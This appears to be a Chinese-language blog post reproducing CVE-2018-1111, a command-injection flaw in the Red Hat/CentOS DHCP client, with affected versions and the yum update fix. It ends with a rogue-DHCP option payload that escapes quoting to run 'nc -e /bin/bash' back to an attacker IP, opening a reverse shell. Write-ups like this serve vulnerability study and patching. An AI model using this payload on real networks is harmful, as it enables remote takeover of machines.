Menu

Red Hat DHCP客户端命令执行漏洞(CVE-2018-1111)复现

0 Comment

0x01 漏洞影响面

影响版本

  • Red Hat Enterprise Linux Server 6
  • Red Hat Enterprise Linux Server 7
  • CentOS 6
  • CentOS 7

修复方案

  • 受影响产品的更新

  • 软件包更新
    #yum update dhclient 
    #rpm -qa --changelog dhclient  | grep CVE-2018
        - Resolves: #1570898 - Fix CVE-2018-1111: Do not parse backslash as escape character

 

0x02 漏洞详情

DHCP 是一个局域网的网络协议,主要用于内部网络动态IP地址分配。

所以说这是一个在局域网才能利用的漏洞,将自己的攻击机设置为DHCP服务器,当新接入局域网的Red Hat想要通过DHCP获取IP时,获得的响应中有执行代码

Red Hat提供的DHCP客户端软件包dhclient的脚本为/etc/NetworkManager/dispatcher.d/11-dhclient(Red Hat Enterprise Linux 7)和/etc/NetworkManager/dispatcher.d/10-dhclient(Red Hat Enterprise Linux 6);当NetworkManager组件从DHCP服务器收到DHCP响应时执行该脚本。

alt

使用单引号使参数值逃逸成功,导致了命令执行

--dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #"

发表评论

电子邮件地址不会被公开。 必填项已用*标注